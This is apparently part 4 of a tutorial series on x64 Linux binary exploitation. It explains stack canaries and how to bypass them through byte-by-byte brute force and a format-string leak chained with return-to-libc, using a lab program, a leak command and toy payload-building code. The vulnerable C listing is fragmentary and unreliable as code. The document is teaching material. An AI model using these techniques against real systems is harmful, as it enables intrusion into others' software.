Introduction to x64 Linux Binary Exploitation (Part 4) - Stack Canaries
This post is the fourth one of a series of articles in which we are exploring some basic x64 Linux Binary Exploitation techniques. We started with a simple buffer overflow in which all memory protection mechanisms were disabled and gradually we enabled them - one by one - in order to explore how they can be circumvented. More specifically:
- In Part 1, we developed a Linux executable which was vulnerable to a buffer overflow and we exploited it after disabling all the memory protection mechanisms.
- In Part 2, we enabled NX and we demonstrated how this protection can be circumvented using a return into library technique.
- In Part 3, we enabled NX once again and we demonstrated an additional bypass technique which uses a return into libc technique in conjunction with the mprotect system call.
In this part we are going to discuss stack canaries (or security cookies, if you prefer) and see under which conditions this protection mechanism can be bypassed.
About: Stack Canaries
The term stack canary alludes to the canary in a coal mine, the early-warning practice used by coal miners from the early 20th century up to the 1980s. A stack canary is a mitigation against stack-based buffer overflows which leverages the fact that such an attack has to overwrite all the memory between the overflowed buffer and the return address, which is also stored on the stack. Assume that at the beginning of a function call (i.e. during its prologue) we save a value in the function’s stack frame. If everything went well, we would expect to read the same value just before the function exits, namely at its epilogue. If the value has changed, the execution of the program is terminated and an error message is displayed.
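The prologue and epilogue logic described above can be sketched as a toy model in Python. This is only an illustration, not how a compiler implements it: the frame layout, the 16-byte buffer size and the call_function helper are assumptions made for the example.

```python
import os

BUF_SIZE = 16  # hypothetical buffer size, chosen only for this illustration


def call_function(user_input: bytes, canary: bytes) -> str:
    """Simulate one function call on a toy stack frame."""
    # Prologue: lay out the frame as [buffer | canary | saved rbp | return address].
    frame = bytearray(BUF_SIZE) + bytearray(canary) + bytearray(8) + bytearray(8)

    # Body: an unchecked copy that may run past the end of the buffer.
    # The input is capped at the frame size so the toy model stays self-contained.
    data = user_input[:len(frame)]
    frame[:len(data)] = data

    # Epilogue: compare the stored copy with the reference value before returning.
    stored = bytes(frame[BUF_SIZE:BUF_SIZE + len(canary)])
    if stored != canary:
        return "*** stack smashing detected ***"
    return "returned normally"


canary = os.urandom(8)
print(call_function(b"A" * 8, canary))   # stays inside the buffer
print(call_function(b"A" * 40, canary))  # runs over the canary and the return address
```

Any input long enough to reach the return address necessarily passes through the canary slot first, which is exactly what the epilogue check relies on.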
A visual representation of the concept is depicted in the figure below. Since the return address has to be overwritten in order to gain control of the code flow, the adversary has to deal with the canary somehow, or else it will start chirping *** stack smashing detected ***:
Reasonably, someone might ask: why not simply embed the canary value at the right offset of the payload, so that the epilogue check passes?
Well…There are three main types of canaries:
Terminator: consists of at least one string-terminating character (newline, null, etc.). The idea is that, since most overflow vulnerabilities stem from functions such as gets() and strcpy(), the attacker won’t be able to include these characters in the payload.
Consider for example a gets()-based overflow: as this function stops reading when it encounters a newline character, the attacker won’t be able to “replicate” such a character in the payload, and thus the epilogue check will fail. However, the same protection strategy fails for “raw” memory operations like memcpy, memset, etc.
Random: consists of a random byte sequence that is not known to the attacker.
The value is stored in a table or a constant and is compared with the value on the stack at the function’s epilogue. This approach, though, fails if the attacker manages to chain the buffer overflow (BoF) with a memory leak vulnerability.
Random XOR: consists of a random value (as above) XORed with a mask constructed from the adjacent frame pointer and return address.
Similarly to the random canary, a memory leak may reveal both the XORed value and the saved addresses, allowing the attacker to compute the final value.
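To make the terminator canary argument concrete, here is a minimal sketch that compares a strcpy()-style copy with a memcpy()-style copy against the same toy frame. The canary bytes, the frame layout and all helper names are assumptions made for illustration only.

```python
BUF_SIZE = 8
CANARY = b"\x00\x0d\x0a\xff"  # illustrative terminator canary: NUL, CR, LF, 0xFF
OLD_RET = b"\x11" * 8         # placeholder for the legitimate return address
NEW_RET = b"\x42" * 8         # placeholder for the attacker's return address


def fresh_frame() -> bytearray:
    """Toy frame laid out as [buffer | canary | return address]."""
    return bytearray(BUF_SIZE) + bytearray(CANARY) + bytearray(OLD_RET)


def strcpy_like(frame: bytearray, src: bytes) -> None:
    """Copy up to and including the first NUL byte, as strcpy() would."""
    end = src.index(b"\x00") + 1 if b"\x00" in src else len(src)
    frame[:end] = src[:end]


def memcpy_like(frame: bytearray, src: bytes) -> None:
    """Copy every byte regardless of its value, as memcpy() would."""
    frame[:len(src)] = src


def outcome(frame: bytearray) -> str:
    """Classify the frame after the copy."""
    if bytes(frame[BUF_SIZE:BUF_SIZE + len(CANARY)]) != CANARY:
        return "detected"
    return "hijacked" if bytes(frame[-8:]) == NEW_RET else "harmless"


# The attacker knows the canary and embeds it at the right offset.
payload = b"A" * BUF_SIZE + CANARY + NEW_RET

frame = fresh_frame()
strcpy_like(frame, payload)
print("strcpy-like:", outcome(frame))

frame = fresh_frame()
memcpy_like(frame, payload)
print("memcpy-like:", outcome(frame))
```

With the string copy, the write stops at the canary’s NUL byte, so the return address is never reached. With the raw copy, the embedded canary passes the check and the return address is replaced.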
Obviously, this protection mechanism is added by the compiler during the compilation process. For the GNU Compiler Collection (gcc), it was first implemented via the StackGuard extension, which was released as a patch to gcc 2.7.2.2. The gcc function prologue and function epilogue functions have been altered to emit code to place and check canary words. The changes are architecture-specific (in the original implementation, i386), but since the total changes are under 100 lines of gcc, portability is not a major concern. All the changes in the gcc calling conventions are undertaken by the callee, so code compiled with the StackGuard-enhanced gcc is completely inter-operable with generic gcc .o files and libraries. In the most recent gcc implementation, the enhancement adds a global variable holding a random value, or a terminator canary in case the former fails (line 104):
As it is depicted below, when the comparison fails, the familiar *** stack smashing detected *** message is displayed:
As this protection is applied by default in gcc, we just have to omit the -fno-stack-protector flag during the compilation process to end up with the following protection mechanisms:
Circumventing Canary Protection Mechanisms
Let’s first see what this type of protection looks like at a lower level. We are going to compile our vulnerable program with the stack protection enabled and load it in gdb. For the sake of completeness, the program is the following:
Compile with $ gcc vuln.c -o vuln -D_FORTIFY_SOURCE=0 and let’s disassemble the greet_me function:
Notice first that the content of fs:0x28 is moved to the rax register and subsequently stored at the rbp-0x8 address location (1). A few lines below, the value at rbp-0x8 is moved to the rax register and compared with the value at fs:0x28 (2). If the values match, a jump is performed to the leave instruction, which is followed by a ret; otherwise __stack_chk_fail is called and the process is aborted.
Definition: The leave instruction reverses the actions of an enter instruction. leave copies the frame pointer to the stack pointer and releases the stack space formerly used by a procedure for its local variables. leave then pops the old frame pointer into (E)BP, thus restoring the caller’s frame. A subsequent ret nn instruction removes any arguments pushed onto the stack of the exiting procedure.
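As a rough illustration of the definition above, the following sketch applies leave and ret to a toy stack. The addresses and values are hypothetical, and the dictionary-based stack is only a model of 8-byte slots, not a real emulator.

```python
def leave_ret(stack: dict, rbp: int):
    """Apply `leave` followed by `ret` to a toy stack of 8-byte slots."""
    rsp = rbp            # leave, step 1: mov rsp, rbp (release the locals)
    rbp = stack[rsp]     # leave, step 2: pop rbp (restore the caller's frame)
    rsp += 8
    rip = stack[rsp]     # ret: pop the return address into rip
    rsp += 8
    return rip, rsp, rbp


# Hypothetical frame: the canary sits right below the saved rbp.
stack = {
    0x0FF8: 0x5C2F7A1E9B3D4400,  # rbp-0x8: canary
    0x1000: 0x1040,              # rbp:     saved frame pointer of the caller
    0x1008: 0x401234,            # rbp+0x8: return address
}

rip, rsp, rbp = leave_ret(stack, rbp=0x1000)
print(hex(rip), hex(rsp), hex(rbp))
```

The model also shows why the canary at rbp-0x8 is the last slot an overflow has to cross before it reaches the saved frame pointer and the return address consumed by ret.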
The “mysterious” fs:0x28 refers to offset 0x28 from the FS segment base, which is set by a call to the arch_prctl system call during process initialisation:
This call is made by the dynamic loader, /lib64/ld-linux-x86-64.so.2. More specifically, the loader initialises the Thread-Local Storage (TLS) and sets the FS segment base to point to the beginning of the TLS:
Subsequently, security_init sets the stack cookie value stored at fs:0x28:
As you should have already guessed by now, if the adversary knows the cookie value then it is easy to overwrite the content at rbp-0x8 with a matching value. Additionally, as the cookie is set only once, if it is leaked at some point of the program’s execution then it can be used to bypass the guard in every function call. With this information in hand, let’s voluntarily print the canary value in the vulnerable program:
As we saw before, gcc doesn’t use a XOR canary, thus the cookie value should be the same for every function call. Indeed, if you run it a couple of times you may notice that the value is the same for both greet_me and greet_me_again function calls:
One last thing to notice is that the printed canary always ends with 0x00. This is its least significant byte, which on a little-endian machine is the first byte in memory, and it serves as a terminator for the purposes we discussed in the previous paragraphs.
There are two main ways in which this protection mechanism may fail. The first is to brute-force the cookie value, while the second is to chain the BoF with a memory leak vulnerability (e.g. a format string). We are going to discuss both in the following paragraphs.
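The relation between the printed value and its in-memory layout can be checked with a short sketch. It assumes that the canary is built from 8 random bytes whose low byte is then cleared, which matches the observed behaviour; make_canary is a hypothetical helper, not a glibc function.

```python
import os
import struct


def make_canary(random_bytes: bytes) -> int:
    """Build a 64-bit canary from 8 random bytes, forcing the low byte to zero."""
    value = int.from_bytes(random_bytes[:8], "little")
    return value & ~0xFF & 0xFFFFFFFFFFFFFFFF


canary = make_canary(os.urandom(8))
in_memory = struct.pack("<Q", canary)  # little-endian, as stored at rbp-0x8

print(f"printed value  : {canary:#018x}")        # last two hex digits are 00
print(f"bytes in memory: {in_memory.hex(' ')}")  # first byte is 00
```

Because the zero byte comes first in memory, a string copy that overflows the buffer hits the terminator before it can touch the random part of the canary.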
Bruteforcing the *__stack_chk_guard
This type of attack might be successful on 32-bit systems, where the 24-bit entropy of the cookie (considering the NULL byte at the end) can be exhausted in reasonable time. On x64 systems this approach is far less feasible, as the entropy increases to 56 bits, ending up in 2⁵⁶ tries in the worst-case scenario. Imagine though a server that forks a subprocess to handle each new client and sends the client’s input to this child process. As fork() copies the parent’s memory, the child process will have the same canary word on every spawn, so an adversary may overwrite one byte at a time and observe the child’s behaviour. Similarly to a padding oracle, if the child process crashes then we keep guessing the same position, otherwise we move on to the next one:
- |x1|x2|x3|x4|x5|x6|x7|x8| → initial state
overwrite x1, set i = 0x00
- |i|x2|x3|x4|x5|x6|x7|x8| → if crash then send(i++) else guess(x2)
- |00|45|98|i|x5|x6|x7|x8| → if crash then send(i++) else guess(x5)
- |00|45|98|AC|DE|A9|BA|01| → success
This byte-for-byte (bfb) brute force attack decreases the number of tries to at most 256 x 7 = 1792. For this reason, most canary implementations set one of the canary bytes to zero, which prevents bfb attacks when the overflow is performed by a string copy function. We won’t go further into this type of attack, but for those who are interested there is an interesting write-up about HTB’s Rope which demonstrates it.
A memory leak chained with a buffer overflow renders this protection mechanism totally futile. The format string attack is a perfect example of such a leak, and we are going to use it in order to demonstrate the bypass. This time our vulnerable program should look like the one below:
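The byte-for-byte procedure can be simulated offline with a stand-in for the forking server. In this sketch the oracle simply reports whether the overwritten prefix of the canary matches. In a real attack that answer would come from observing whether the child process crashes. The make_oracle and brute_force names are hypothetical.

```python
import os

CANARY_LEN = 8


def make_oracle(secret: bytes):
    """Stand-in for the forking server: True if the child survives, False if it crashes."""
    def survives(overflow: bytes) -> bool:
        # Only the overwritten prefix changes; the rest of the canary stays intact.
        return secret[:len(overflow)] == overflow
    return survives


def brute_force(survives, length: int = CANARY_LEN):
    """Recover the canary one byte at a time, counting the requests sent."""
    known = b""
    attempts = 0
    for _ in range(length):
        for guess in range(256):
            attempts += 1
            if survives(known + bytes([guess])):
                known += bytes([guess])  # child survived: keep the byte, move on
                break
        else:
            raise RuntimeError("no byte value survived; the oracle is unreliable")
    return known, attempts


secret = b"\x00" + os.urandom(7)  # low byte fixed to zero, seven random bytes
recovered, attempts = brute_force(make_oracle(secret))
print(recovered == secret, attempts)
```

Since the first byte is known to be zero, the loop needs a single request for it and at most 256 requests for each of the remaining seven bytes.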
#include <stdio.h>
#define unsigned_long_int unsigned long int
void greet_me(char *input)
printf("Hi there %s !!\n",name);
}
int main(int argc, char *argv[])
We won’t go into detail about the format string attack, as it is out of scope for this post, but notice the printf in the greet_me function, which literally prints “raw” the string that is given as the first argument to the program.
Compile with $ gcc vuln.c -o vuln -D_FORTIFY_SOURCE=0 and enter the following string as the first argument:
Notice the highlighted output in position 33, which ends with a 0x00 byte:
Now, isolate this number by running ./vuln %33\$llx and repeat running the program a few times. By observing the output you may notice that the 0x00 byte at the end remains unchanged while the rest of the value differs on every run. This matches the cookie format that we discussed in the previous paragraphs, so let’s use it in order to craft the new exploitation script.
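Turning the leaked text into a usable number is a small step that the exploit script has to perform. The sketch below assumes that the program’s output for the %33$llx argument can be reduced to the bare hexadecimal digits; the sample value and the helper names are hypothetical.

```python
def leak_format(position: int) -> str:
    """Build the positional format specifier that prints one 64-bit stack slot."""
    return f"%{position}$llx"


def parse_leak(output: str) -> int:
    """Convert the hex text printed by %llx into an integer."""
    return int(output.strip(), 16)


def looks_like_canary(value: int) -> bool:
    """Heuristic only: a non-zero 64-bit value whose least significant byte is zero."""
    return 0 < value < 2**64 and (value & 0xFF) == 0


print(leak_format(33))                    # remember to escape the $ in a shell
leaked = parse_leak("5c2f7a1e9b3d4400\n")  # hypothetical program output
print(hex(leaked), looks_like_canary(leaked))
```

The heuristic can produce false positives, so comparing several runs, as suggested above, remains the more reliable check.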
We are going to use the return-to-libc attack discussed in Part 2, making of course some adjustments to the final payload. Additionally, we are going to use the pwntools framework in order to accelerate the exploit development process. As it is depicted below, the junk size should shrink to 200 bytes so that the canary value can follow it, the next 8 bytes will overwrite the saved RBP, and the rest of the payload should be the same as before:
After crafting the exploitation script accordingly, at this point it should look as below:
As you will probably notice, the only differences from the script of Part 2 are the addition of the canary value and the fact that we are now interacting with the vulnerable program. The lines 32–33 just write the payload to a file, mainly for debugging reasons, thus they can be omitted.
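The payload layout described earlier (200 bytes of junk, the canary, 8 bytes for the saved RBP, then the chain) can be sketched without pwntools as follows. Every address and the canary value are hypothetical placeholders, and the three-entry chain is only an assumption about what a return-to-libc chain might look like. The p64 helper mirrors what the pwntools function of the same name does for little-endian targets.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


def build_payload(canary: int, chain: bytes, junk_size: int = 200) -> bytes:
    """Assemble junk + canary + saved RBP filler + return chain."""
    junk = b"A" * junk_size  # fills the buffer up to the canary slot
    saved_rbp = b"B" * 8     # overwrites the saved RBP; the value is not used here
    return junk + p64(canary) + saved_rbp + chain


# Hypothetical placeholders: replace with values found for the actual target.
POP_RDI_RET = 0x00000000004011FB
BIN_SH_ADDR = 0x00007FFFF7F5BD88
SYSTEM_ADDR = 0x00007FFFF7E12290
LEAKED_CANARY = 0x5C2F7A1E9B3D4400

chain = p64(POP_RDI_RET) + p64(BIN_SH_ADDR) + p64(SYSTEM_ADDR)
payload = build_payload(LEAKED_CANARY, chain)
print(len(payload), payload[200:208].hex())
```

Keeping the canary as a separate argument makes it easy to plug in the value leaked at run time, since it changes on every execution of the program.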
And with that, we are concluding this part, leaving the ASLR protection for the last part of these tutorials.